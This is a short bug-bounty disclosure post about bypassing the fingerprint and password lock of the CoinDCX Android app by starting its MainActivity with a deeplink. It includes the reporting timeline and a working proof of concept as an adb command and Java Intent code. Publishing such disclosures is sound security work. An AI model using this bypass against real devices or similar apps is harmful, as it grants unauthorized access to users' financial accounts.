Bypass of biometrics & password security functionality for Android
2021-10-11 15:30:22 Author: infosecwriteups.com(查看原文) 阅读量:34 收藏

Dheeraj Madhukar

Reported : Sat, Feb 27, 8:52 PM — 2020
Reported Again : Mon, Nov 2, 2020, 3:12 AM
Req for an update : Sat, Nov 7, 2020, 10:02 AM
Another req for update : Wed, Nov 11, 2020, 12:20 PM
.
.
.

No response from COINDCX, then i decided to tweed and tag the authorities to reach them.
https://twitter.com/Dheerajmadhukar/status/1365683708104118277

https://twitter.com/nrjkhandelwal
https://twitter.com/smtgpt

Again nobody even care! ** BUT BUG IS FIXED **

Now you have the actual report ;) & POC

Asset:
com.coindcx (Android: Play Store)

Asset Details:
Version — 0.8.3
Updated — October 27, 2020

Test Android Device Details:
Non-rooted

Weakness:
Improper Authentication — Generic

Summary:
CoinDCX Android App has an option to unlock the app using fingerprint and password. But if “com.coindcx.MainActivity” activity triggers with “deeplink”, authentication is no longer required.

Step to Reproduce:
It is possible via ADB and Java (Android App):

ADB command:
$ adb shell am start -n com.coindcx/.MainActivity -d “https://coindcx.com"

Java (Android App):

Intent intent = new Intent();
intent.setClassName(“com.coindcx”, “com.coindcx.MainActivity”);
intent.setData(Uri.parse(“https://coindcx.com"));
startActivity(intent);

Impact:
Unauthorized access to use the application.

PoC [ Proof of Concept ]

Twitter profile: @Dheerajmadhukar

LinkedIn profile: @dheerajtechnolegends


文章来源: https://infosecwriteups.com/bypass-of-biometrics-password-security-functionality-for-android-8e0174ac7cac?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh